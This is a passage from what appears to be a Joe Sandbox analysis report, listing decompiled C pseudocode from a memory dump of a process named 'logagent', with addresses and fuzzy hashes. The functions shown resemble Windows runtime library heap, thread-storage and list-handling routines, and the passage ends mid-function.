                                              0x052226c9
                                              0x052226c9
                                              0x051daeb3
                                              0x052226d4
                                              0x052226e1
                                              0x00000000
                                              0x00000000
                                              0x052226e7
                                              0x052226ee
                                              0x052226f0
                                              0x052226f9
                                              0x052226f9
                                              0x05222702
                                              0x05222708
                                              0x05222708
                                              0x0522270b
                                              0x0522270f
                                              0x05222711
                                              0x05222711
                                              0x05222725
                                              0x05222725
                                              0x00000000
                                              0x051daeb9
                                              0x051daeb9
                                              0x051daebf
                                              0x051daebf
                                              0x051daeb3

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                              • Instruction ID: cf6ee2341cff53bbea4816c0595e74d4c0b063c7e8cf5d58c9203b2259ce1c5b
                                              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                              • Instruction Fuzzy Hash: EC21D47A615692EFD725DB29C948B35B7EAFF45240F0A00A0DD098B6A2D735DC80C7B0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EFD9B Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E051EFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E051C76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                              0x051efd9b
                                              0x051efda0
                                              0x051efda1
                                              0x051efdab
                                              0x051efdad
                                              0x051efdb0
                                              0x051efdb8
                                              0x051efe0f
                                              0x051efde6
                                              0x051efde9
                                              0x051efdec
                                              0x0522c0c0
                                              0x051efdfe
                                              0x051efe06
                                              0x051efe06
                                              0x0522c0c8
                                              0x051efe2d
                                              0x051efe2d
                                              0x00000000
                                              0x051efe2d
                                              0x0522c0d1
                                              0x0522c0e0
                                              0x0522c0e5
                                              0x0522c0e5
                                              0x0522c0e8
                                              0x00000000
                                              0x0522c0e8
                                              0x051efdf4
                                              0x00000000
                                              0x00000000
                                              0x051efdf6
                                              0x051efdfa
                                              0x051efe1a
                                              0x051efe1f
                                              0x051efe1f
                                              0x051efdfc
                                              0x00000000
                                              0x051efdfc
                                              0x051efdcc
                                              0x051efdd0
                                              0x051efe26
                                              0x00000000
                                              0x051efe26
                                              0x051efdd8
                                              0x051efddb
                                              0x051efddd
                                              0x051efde0
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                              • Instruction ID: 453c92b0f0e9e65ddab5208d9935a6338c80afc5ae2cecbb9c5f8f246d58dd60
                                              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                              • Instruction Fuzzy Hash: 4E21A976A04A40DFD734CF09C540E66FBEAFB94B10F22846EE84A87711D730AC42CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C841F Relevance: .1, Instructions: 64COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E051C841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E051F9810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}













                                              0x051c842f
                                              0x051c8448
                                              0x051c844e
                                              0x051c8459
                                              0x051c845b
                                              0x051c8464
                                              0x05219ac3
                                              0x05219ac3
                                              0x05219ac5
                                              0x05219acb
                                              0x00000000
                                              0x00000000
                                              0x05219acd
                                              0x05219acd
                                              0x05219ad1
                                              0x05219ae9
                                              0x051c846a
                                              0x051c8475
                                              0x051c8479
                                              0x051c847c
                                              0x051c8481
                                              0x051c8482
                                              0x051c849a

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                              • Instruction ID: a020dca806db43c93fa2efac2b82553c290358502bcada4a325f49bffe21a38a
                                              • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                              • Instruction Fuzzy Hash: CA216D76E00119DBCB14CFA9C580A9AF3F9FB98350FA645A5ED59B7344CA30AE44CBD0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EB390 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E051EB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E051D2280(_t12, 0x52a8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E051F00C2(0x52a8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                              0x051eb395
                                              0x051eb3a2
                                              0x051eb3a5
                                              0x051eb3aa
                                              0x051eb3b2
                                              0x051eb3ba
                                              0x051eb3bd
                                              0x051eb3c0
                                              0x051eb3c4
                                              0x051eb3c9
                                              0x0522a3e9
                                              0x0522a3ed
                                              0x0522a3f0
                                              0x0522a3ff
                                              0x0522a403
                                              0x0522a409
                                              0x00000000
                                              0x00000000
                                              0x0522a40b
                                              0x0522a40b
                                              0x0522a40f
                                              0x0522a415
                                              0x0522a423
                                              0x0522a423
                                              0x0522a415
                                              0x051eb3d1
                                              0x051eb3e8
                                              0x051eb3e8
                                              0x051eb3d9

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9bdaa9ba72e73b6b1c82f4f5f066b25480190872287707f0608760d8745e55c6
                                              • Instruction ID: 82700b4092834c8d40349c164559bd6902375bbea048ef20a54e568f3cb5f0e5
                                              • Opcode Fuzzy Hash: 9bdaa9ba72e73b6b1c82f4f5f066b25480190872287707f0608760d8745e55c6
                                              • Instruction Fuzzy Hash: EA116B377255209BCB2CDA158E82E2BB267FFC5730B294129ED16C7B80DF71AC02C690
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B9240 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 77%
                                              			E051B9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x528f708);
				E0520D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E051F95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E051F95D0();
				_t33 =  *0x52a84c4; // 0x0
				L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x52a84c4; // 0x0
				L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x52a84c4; // 0x0
				E051D2280(L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x52a86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E051F95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E051F95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E051B9325();
					_t50 =  *0x52a84c4; // 0x0
					return E0520D0D1(L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                              0x051b9240
                                              0x051b9242
                                              0x051b9247
                                              0x051b924c
                                              0x051b924e
                                              0x051b9255
                                              0x051b9257
                                              0x051b925a
                                              0x051b925f
                                              0x051b925f
                                              0x051b9266
                                              0x051b9271
                                              0x051b9276
                                              0x051b9279
                                              0x051b927e
                                              0x051b9295
                                              0x051b929a
                                              0x051b92b1
                                              0x051b92b6
                                              0x051b92d7
                                              0x051b92dc
                                              0x051b92e0
                                              0x051b92e6
                                              0x051b92e8
                                              0x051b92ee
                                              0x051b9332
                                              0x051b9333
                                              0x051b9337
                                              0x051b9338
                                              0x051b933a
                                              0x051b933a
                                              0x051b933d
                                              0x051b9342
                                              0x051b9342
                                              0x051b9345
                                              0x051b9349
                                              0x051b934e
                                              0x051b9352
                                              0x051b9357
                                              0x051b92f4
                                              0x051b92f4
                                              0x051b92f6
                                              0x051b92f9
                                              0x051b9300
                                              0x051b9306
                                              0x051b9324
                                              0x051b9324

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 0adbc94e3569a5d30d292a41ff4d5d628def0dd347bb4f317ab798f8719d0c30
                                              • Instruction ID: b4e55e5ae4ca0a83a7eaf843005af00ebe27f53ea2676ac5769b519397dee398
                                              • Opcode Fuzzy Hash: 0adbc94e3569a5d30d292a41ff4d5d628def0dd347bb4f317ab798f8719d0c30
                                              • Instruction Fuzzy Hash: E6215772251A00DFD721EF68CA48F5AB7B9FF08704F144668E24A866B2CB74E942CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05244257 Relevance: .1, Instructions: 60COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E05244257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x52908d0);
				E0520D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E052441E8(__ebx, __edi, __ecx, _t39);
				E051CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x52a87e4;
					_t18 =  *0x52a87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x52a5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x52a87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x52a87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L051B7055(_t31 + 0xfffffff8);
								_t24 =  *0x52a87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x52a87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x52a5cd0;
				if( *0x52a5cd0 <= 0) {
					L051B7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x52a87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x52a87e8 = _t30;
						 *0x52a87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0520D0D1(L05244320());
			}















                                              0x05244257
                                              0x05244257
                                              0x05244257
                                              0x05244259
                                              0x0524425e
                                              0x05244263
                                              0x05244265
                                              0x05244273
                                              0x05244278
                                              0x0524427c
                                              0x0524427f
                                              0x05244281
                                              0x05244287
                                              0x052442d7
                                              0x052442d7
                                              0x052442da
                                              0x0524428d
                                              0x0524428d
                                              0x0524428f
                                              0x05244292
                                              0x05244297
                                              0x0524429c
                                              0x052442a0
                                              0x052442a6
                                              0x052442a8
                                              0x052442ae
                                              0x052442b3
                                              0x00000000
                                              0x052442ba
                                              0x052442ba
                                              0x052442bf
                                              0x052442c5
                                              0x052442ca
                                              0x052442cf
                                              0x052442d0
                                              0x00000000
                                              0x052442d0
                                              0x052442b3
                                              0x00000000
                                              0x052442a6
                                              0x0524429c
                                              0x052442dc
                                              0x052442dc
                                              0x052442e3
                                              0x05244309
                                              0x052442e5
                                              0x052442e5
                                              0x052442e8
                                              0x052442ee
                                              0x052442f0
                                              0x00000000
                                              0x052442f2
                                              0x052442f2
                                              0x052442f4
                                              0x052442f7
                                              0x052442f9
                                              0x05244300
                                              0x05244300
                                              0x052442f0
                                              0x0524430e
                                              0x0524431f

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 011a085bbaf9218397ec80d89870a4b7833a6b28867cded0b68e9224f024873e
                                              • Instruction ID: d9cffa0c6c2fb02e83b9b02a4066bf0793701f26f9259f19b575950cabe7142f
                                              • Opcode Fuzzy Hash: 011a085bbaf9218397ec80d89870a4b7833a6b28867cded0b68e9224f024873e
                                              • Instruction Fuzzy Hash: 17216DB6A21701DFDB1AEF64E449B687BF2FF85314B60826ED1099F295DB319481CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E2397 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 34%
                                              			E051E2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x52a848c != 0) {
					L051DFAD0(0x52a8610);
					if( *0x52a848c == 0) {
						E051DFA00(0x52a8610, _t19, _t27, 0x52a8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E051E2581(0x52a8610, 0x51950a0, _t26, _t27, _t28);
						E051DFA00(0x52a8610, 0x51950a0, _t27, 0x52a8610);
					}
				} else {
					L1:
					_t11 =  *0x52a8614; // 0x1
					if(_t11 == 0) {
						_t11 = E051F4886(0x5191088, 1, 0x52a8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E051E2581(0x52a8610, (_t11 << 4) + 0x5195070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                              0x051e23b0
                                              0x051e23b6
                                              0x051e2409
                                              0x051e2415
                                              0x05225ae9
                                              0x00000000
                                              0x051e241b
                                              0x051e241b
                                              0x051e241d
                                              0x051e2427
                                              0x051e242e
                                              0x051e2430
                                              0x051e2430
                                              0x051e23b8
                                              0x051e23b8
                                              0x051e23b8
                                              0x051e23bf
                                              0x051e23fc
                                              0x051e23fc
                                              0x051e23c1
                                              0x051e23c3
                                              0x051e23d0
                                              0x051e23d8
                                              0x051e23d8
                                              0x051e23dc
                                              0x051e23de
                                              0x051e23e1
                                              0x051e23e1
                                              0x051e23ec

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5101d38a755398db4239ce6f13f40156164a37a6723409362b073b09579270f6
                                              • Instruction ID: c6f6aff0d80c4febd96eb9df419f9977ccd1f9731158d0d127f1c64a2f582841
                                              • Opcode Fuzzy Hash: 5101d38a755398db4239ce6f13f40156164a37a6723409362b073b09579270f6
                                              • Instruction Fuzzy Hash: 2311663270475067E7389629AC99F25B6DEBF94720F0D4026F603A7282CBB8EC018B64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052346A7 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E052346A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E051FF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E051ED268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L051D77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                              0x052346b7
                                              0x052346ba
                                              0x052346c5
                                              0x052346c8
                                              0x052346d0
                                              0x052346d4
                                              0x052346e6
                                              0x052346e9
                                              0x052346f4
                                              0x052346ff
                                              0x05234705
                                              0x05234706
                                              0x0523470c
                                              0x05234713
                                              0x0523471b
                                              0x05234723
                                              0x05234725
                                              0x052346d6
                                              0x052346d9
                                              0x052346db
                                              0x052346db
                                              0x05234732

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                              • Instruction ID: 7b4ec65878015358333375b3e7631066c7bc67fe00c4863041ad64f4f78dc0ba
                                              • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                              • Instruction Fuzzy Hash: A111C272604208BBCB05AF5C98849BEFBB9EF95300F1080AAF9448B351DA718D55D7A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051BC962 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 42%
                                              			E051BC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x52ad360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E051CEEF0(0x52a70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0523F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E051CEB70(_t29, 0x52a70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E051FB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0523F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x52a70c0; // 0x0
					while(_t38 != 0x52a70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x52ab1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                              0x051bc96a
                                              0x051bc974
                                              0x051bc988
                                              0x051bc98a
                                              0x05227c9d
                                              0x05227c9f
                                              0x05227ca4
                                              0x05227cae
                                              0x05227cf0
                                              0x05227cf5
                                              0x05227cfa
                                              0x051bc992
                                              0x051bc996
                                              0x051bc997
                                              0x051bc998
                                              0x051bc9a3
                                              0x051bc9a3
                                              0x05227cb0
                                              0x05227cb7
                                              0x05227cbb
                                              0x00000000
                                              0x00000000
                                              0x05227cbd
                                              0x05227ce8
                                              0x05227cc5
                                              0x05227cc8
                                              0x05227cca
                                              0x05227cd0
                                              0x05227cd6
                                              0x05227cde
                                              0x05227ce4
                                              0x05227ce4
                                              0x05227cd0
                                              0x00000000
                                              0x05227ce8
                                              0x051bc990
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 690ef546ef6d724369743feb2fc7806ed7b10052fbd822a7fe408c76b1fa47ca
                                              • Instruction ID: a8a4243823bd2a9316062cd0f44601ac37f1dab31f15fcf6ea4b52e600063a5e
                                              • Opcode Fuzzy Hash: 690ef546ef6d724369743feb2fc7806ed7b10052fbd822a7fe408c76b1fa47ca
                                              • Instruction Fuzzy Hash: 1311E532728616ABC710AF38DC8AA6B7BE6FF84610F080529F84983651DF60EC14CBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051F37F5 Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 87%
                                              			E051F37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
